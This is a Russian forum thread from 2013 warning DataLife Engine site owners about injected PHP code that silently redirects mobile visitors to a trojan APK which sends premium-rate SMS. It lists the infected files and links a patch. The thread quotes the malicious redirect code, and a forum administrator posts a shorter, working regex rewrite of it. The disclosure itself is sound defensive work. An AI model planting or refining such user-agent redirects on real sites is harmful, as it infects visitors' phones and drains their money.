Добрый вечер, Гость! Представляем Вам наши форумы. Вы можете зарегистрироваться чтобы писать на форумах или зайдите под своим именем, если Вы уже регистрировались.
   
   


Форум
 Разное | Флейм
         Если у вас есть сайт на Datalife Engine, критическая уязвимость

Похожие темы  |  Печать страницы

Если у вас есть сайт на Datalife Engine, критическая уязвимость


События Среда, 16.01.2013, 00:36

Kurman

Группа: Пользователь
Ранг: Продвинутый
Cообщений: 247
Регистрация: 26.10.2009
Город: Moscow
Троян browser_update_install.apk
В общем, после Нового года, мне 9 января, некоторым 13 января - у кого есть сайты на DLE движке была осуществлена SQL инъекция.

При открытии сайта на компе ничего не происходит, но при заходе с телефона, подгружается browser_update_install.apk - троянец, который впоследствии будет слать с вашего телефона СМС на короткие платные номера, высасывая деньги с счета телефона.

Вот внедренный код:
PHP-код
$iphone strpos($_SERVER['HTTP_USER_AGENT'],"iPhone");
$android strpos($_SERVER['HTTP_USER_AGENT'],"Android");
$palmpre strpos($_SERVER['HTTP_USER_AGENT'],"webOS");
$berry strpos($_SERVER['HTTP_USER_AGENT'],"BlackBerry");
$ipod strpos($_SERVER['HTTP_USER_AGENT'],"iPod");

if (
$iphone || $android || $palmpre || $ipod || $berry === true) { 

    
header('Location: http://domain/');

}


Этот код может быть внедрен в файлы
index.php
engine/engine.php
engine/init.php
engine/data/config.php
engine/data/dbconfig.php

Чуть не поседел, пока пару часов судорожно искал причины.. Хорошие люди выложили, хорошо хоть нашел )))

Решение: удалить код, применить патч http://dle-news.ru/bags/v97/1547-patchi-bezopasnosti-dlya-versiy-97-i-nizhe.html

Отредактировано Kurman: 16.01.2013, 00:37:13

Пользователь офлайн
События Среда, 16.01.2013, 00:57

Status-X

Группа: Администратор
Cообщений: 3005
Регистрация: 23.10.2009
Город: Санкт-Петербург
А SQL инъекция то тут при чем???Ржу нимагу


Пользователь офлайн
События Среда, 16.01.2013, 01:38

Kurman

Автор текущей темы
Группа: Пользователь
Ранг: Продвинутый
Cообщений: 247
Регистрация: 26.10.2009
Город: Moscow
Ну доступ в админку сперва получают наверное через инъекцию ))) а потом внедряют код в файлы. ))

Вот подробное описание: http://forum.antichat.ru/showpost.php?p=3344536&postcount=248
Пользователь офлайн
События Среда, 16.01.2013, 02:20

Status-X

Группа: Администратор
Cообщений: 3005
Регистрация: 23.10.2009
Город: Санкт-Петербург
Цитата
Автор: Kurman
Ну доступ в админку сперва получают наверное через инъекцию ))) а потом внедряют код в файлы. ))

Вот подробное описание: http://forum.antichat.ru/showpost.php?p=3344536&postcount=248


Гораздо проще получить доступ к ftp, чем возится с админкой. А судя по патчу, там вообще php-инъекция была




Пользователь офлайн
События Среда, 16.01.2013, 02:29

Status-X

Группа: Администратор
Cообщений: 3005
Регистрация: 23.10.2009
Город: Санкт-Петербург
И вообще б я так реализовалРжу нимагу
PHP-код
if (preg_match("/iPhone|Android|webOS|BlackBerry|iPod/i"$_SERVER['HTTP_USER_AGENT'])) header('Location: http://domain/');



Пользователь офлайн
События Среда, 16.01.2013, 22:44

Kurman

Автор текущей темы
Группа: Пользователь
Ранг: Продвинутый
Cообщений: 247
Регистрация: 26.10.2009
Город: Moscow
: Ржу нимагу Ну, там ещё одна уязвимость была, из-за register_globals=on, наверное ею тоже воспользовались..
Наверное в истории DLE это один из самых больших дыр, которые в нем находили.. Все пока ещё отходят от шока ))

Попробовал предложенный вариант - работает прекрасно Ржу нимагу и код намного меньше и короче Клево
Пользователь офлайн


Похожие темы  |  Печать страницы  |   Предыдущая тема  |   Следующая тема

Быстрый переход:  
 

 Сейчас на сайте


Пользователей: 0, Гостей: 3

Поисковые боты: 11
Yandex, Unknown Bot, Inktomi Slurp, oBot(3), BingBot(2), Googlebot(3)

 Статистика форума


  Темы Сообщения Пользователи
За сутки:
За неделю:
За месяц:
Всего:
Мы приветствуем нового участника: Lesya

 Дни рождения


TEPMIT (34), system (22)
Печать | Copyright © 2009 - 2016 Status-X All rights reserved | Powered by CMS Status-X 1.05 | Контакты